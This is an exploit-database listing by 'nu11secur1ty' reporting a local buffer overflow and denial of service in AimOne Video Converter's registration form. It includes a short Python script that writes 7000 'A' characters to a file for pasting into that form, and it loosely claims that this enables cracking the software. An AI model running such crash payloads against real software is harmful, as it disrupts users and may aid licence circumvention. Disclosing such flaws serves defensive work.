Lucene search

K
zdtNu11secur1ty1337DAY-ID-38430
HistoryApr 02, 2023 - 12:00 a.m.

AimOne Video Converter V2.04 Build 103 - Buffer Overflow Exploit

2023-04-0200:00:00
nu11secur1ty
0day.today
97
aimone video converter
buffer overflow
denial of service
exploit
registration form
vulnerability
## Title: AimOne Video Converter V2.04 Build 103 - Buffer Overflow (DoS)
## Author: nu11secur1ty
## Vendor: https://aimone-video-converter.software.informer.com/,
http://www.aimonesoft.com/
## Software: https://aimone-video-converter.software.informer.com/download/?ca85d0
## Reference:

## Description:
The AimOne Video Converter V2.04 Build 103 suffers from buffer
overflow and local Denial of Service.
The registration form is not working properly and crashes the video converter.
When the attacker decides to register the product. This can allow him
to easily crack the software and do more bad things it depending on
the case.

## STATUS: HIGH Vulnerability - CRITICAL

[+] Exploit:

```Python
#!/usr/bin/python
# nu11secur1ty

print("WELCOME to the AIMONE Video Converter 2.04 Build 103 - Buffer
Overflow exploit builder...\n")
input("Press any key to build the exploit...\n")
buffer = "\x41" * 7000

try:
	f=open("PoC.txt","w")
	print("[+] Creating %s bytes exploit payload.." %len(buffer))
	f.write(buffer)
	f.close()
	print("[+] The PoC file was created!")
except:
	print("File cannot be created")
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/AimOne/AimOne-Video-Converter-V2.04-Build-103)

## Proof and Exploit:
[href](https://streamable.com/v1hvbf)

## Time spent
`00:35:00`

## Writing an exploit
`00:15:00`


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>